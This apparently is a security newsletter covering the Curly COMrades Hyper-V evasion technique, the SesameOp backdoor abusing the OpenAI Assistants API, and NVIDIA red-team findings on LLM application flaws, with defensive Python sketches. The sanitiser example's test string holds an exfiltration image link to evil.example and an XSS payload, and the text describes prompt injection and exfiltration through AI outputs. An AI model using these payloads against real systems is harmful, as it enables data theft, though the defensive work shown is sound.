CCTR.46.NOV.25
Monday morning cyber coffee read
Some slick tradecraft by Curly COMrades, a threat actor aligned with Russian interests.
They enabled Hyper-V on victims’ Windows hosts to spin up lightweight 120 MB Alpine Linux VMs that operate outside the reach of host-based EDR, creating an isolated and persistent foothold.
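If you want to hunt for this on your own fleet, here is a minimal sketch: Python driving standard PowerShell cmdlets on a Windows host to flag machines where Hyper-V is enabled and guest VMs are registered. The decision of which hosts legitimately run VMs is your policy, not the script's.

```python
# Hypothetical hunting sketch: flag hosts where the Hyper-V feature is enabled
# and guest VMs exist, on machines where virtualisation is not expected.
# Assumes it runs locally on a Windows host with admin rights.
import subprocess

def ps(cmd: str) -> str:
    """Run a PowerShell command and return its stdout."""
    out = subprocess.run(
        ["powershell", "-NoProfile", "-Command", cmd],
        capture_output=True, text=True, timeout=60,
    )
    return out.stdout.strip()

# Is the Hyper-V optional feature enabled on this host?
state = ps("(Get-WindowsOptionalFeature -Online "
           "-FeatureName Microsoft-Hyper-V-All).State")

if state == "Enabled":
    # List registered guest VMs; a small, recently created Linux guest on a
    # workstation that has no business running VMs is worth investigating.
    vms = ps("Get-VM | Select-Object Name, State, CreationTime | Format-List")
    print("Hyper-V is enabled. Registered VMs:")
    print(vms or "(none found)")
else:
    print(f"Hyper-V feature state: {state or 'unknown'}")
```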

As host defences mature, attackers are moving down the stack. EDR is not a silver bullet; treat it as one layer, not the whole defence.
Microsoft discovered a new espionage-focused backdoor, dubbed SesameOp, that abused the OpenAI Assistants API as a covert relay rather than standing up traditional C2 infrastructure.
This let the threat actor blend malicious activity into legitimate traffic, effectively hiding within normal cloud communications. No vulnerability in OpenAI’s systems was exploited; the attacker simply repurposed a legitimate service for stealthy operations.
Monitor for unusual API traffic and outbound connections to unexpected cloud endpoints.
Expect threat actors to weaponise emerging AI services as covert channels; defenders must adapt just as fast.
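A toy version of that monitoring, assuming a CSV proxy log with src_host and dest_domain columns — both the log format and the allowlists below are placeholders to adapt to your own telemetry:

```python
# Minimal detection sketch: scan a proxy/DNS log for hosts reaching AI API
# endpoints that are not on an approved list. Field names and file path are
# assumptions for illustration.
import csv

AI_API_DOMAINS = {"api.openai.com", "api.anthropic.com"}  # extend as needed
APPROVED_HOSTS = {"dev-workstation-01"}  # hosts expected to call these APIs

def find_suspect_connections(log_path: str):
    suspects = []
    with open(log_path, newline="") as f:
        for row in csv.DictReader(f):
            if (row["dest_domain"] in AI_API_DOMAINS
                    and row["src_host"] not in APPROVED_HOSTS):
                suspects.append((row["src_host"], row["dest_domain"]))
    return suspects

if __name__ == "__main__":
    for host, domain in find_suspect_connections("proxy_log.csv"):
        print(f"Review: {host} -> {domain}")
```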
The NVIDIA AI Red Team has evaluated a number of AI-powered applications and uncovered three high-risk vulnerabilities that consistently appear across LLM implementations:
1. Executing LLM-generated code, which can lead to remote code execution (a sketch follows this list).
2. Insecure permissions on RAG data stores, which enable data leakage or prompt injection.
3. Active content rendering of model outputs, which can result in data exfiltration.
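To make the first risk concrete, a deliberately conservative sketch: parse the model’s code with Python’s ast module and refuse anything beyond simple arithmetic before evaluating it. The allowlist here is illustrative; real deployments should sandbox (containers, or no execution at all) rather than rely on filtering alone.

```python
# Illustration of risk 1: never pass model output straight to exec()/eval().
# This parses LLM-generated code and rejects any syntax outside a tiny
# arithmetic allowlist before evaluating.
import ast

ALLOWED_NODES = (
    ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant,
    ast.Add, ast.Sub, ast.Mult, ast.Div, ast.USub,
)

def safe_eval_expression(llm_code: str):
    """Evaluate arithmetic only; raise on anything else (names, calls, imports)."""
    tree = ast.parse(llm_code, mode="eval")
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            raise ValueError(f"Rejected node: {type(node).__name__}")
    # Safe only because every node was checked against the allowlist above.
    return eval(compile(tree, "<llm>", "eval"))

print(safe_eval_expression("2 * (3 + 4)"))   # 14
# safe_eval_expression("__import__('os')")   # raises ValueError: Rejected node
```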

Addressing these vulnerabilities early significantly hardens LLM-based applications against the most common and damaging attacks.
AI security is Application Security. Nothing magical about it.
Don’t execute what the model says.
Don’t trust what it retrieves.
Don’t render what it outputs (sketch below).
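For that last rule, a small illustration: a rendered markdown image or raw HTML in model output can beacon data to an attacker’s server via the URL, so escape and strip before display. The regex is a simplification; use a vetted sanitiser in production.

```python
# Sketch for "don't render what it outputs": drop markdown images and escape
# HTML before displaying model output, since a rendered <img> or ![..](url)
# pointing at an attacker's server can leak data in the request.
import html
import re

MD_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")  # matches ![alt](url)

def sanitise_for_display(model_output: str) -> str:
    no_images = MD_IMAGE.sub("[image removed]", model_output)
    return html.escape(no_images)  # neutralise raw HTML/script tags

out = "Result: 42 ![x](https://evil.example/?d=SECRET) <img src=x onerror=alert(1)>"
print(sanitise_for_display(out))
```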
https://developer.nvidia.com/blog/practical-llm-security-advice-from-the-nvidia-ai-red-team